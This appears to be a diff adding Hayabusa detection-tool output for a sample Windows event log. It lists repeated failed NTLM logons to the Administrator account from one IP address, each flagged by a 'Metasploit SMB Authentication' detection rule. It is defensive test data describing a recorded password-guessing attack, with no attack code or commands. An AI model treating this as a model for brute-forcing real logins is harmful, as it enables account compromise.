+2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bsjAHlztFIC8tBt0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CiEQlAlTOhqOKpmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i7lUqZMROQXNUtQm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0eFCGEtOLzjUxI5v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CqfOAGcVcwSgaeo3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2hcqVJzkVgvUnebk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9ZpqiTGXqJlAQTZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qCzXKlJ2vPeqqdfa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tITW0ihpErFk3nKp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MdQqr1T4frPNlulf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: niiXRpP5AVHpG9Hu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EThR98jZUdwNxbXQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBsJcIw859FfEkLD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kG4Tv5vauSWhbj8F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 453tjgRGMu46vC33  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1fnzhhfszxJWxLCT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWPkeL8TnAbC1nSV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JrDmUzyK4Xxx6Jn1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bMTf9D2yjumfS9LM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8cCs65ithseTCORa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QBrGAScjpAdScGmJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n90F99qBpmUUVLId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MLeOkIG0hVHIOnN7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vVx5uUtkaFIf7PWZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kgd7lCQUQ3dHN18S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b8m2MmpFVK9Uojp7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F0NZjeu3lb5xddVQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YjjXBZnyWt0ljzpv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sinFBozyUR0sBadM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Au22Y0LIuvTmZDpy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QDWW3VfZ7rKayV2v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zPgaFDZtc5wEupnq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TpYZc2TTDfJFnPHo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rYKkl1iHImW9NwKv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KxA2dh1iUMaMWOkA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sCzEzW8jDZGGZcpd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p8510u5OsCVd94I5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2a0whHngnv7o1Bz2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xy6cGuYgubjlXoMw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: luoXLN2XZQC0lHfu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8jdKLW96haKCHHXI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9SQSH6E1aKXu1o7T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nOUdKa838wK1mLFw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aFmILxspIJsiEHwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCz7qbdSEyqxQSKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ny3F1xPgakJK0CA7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
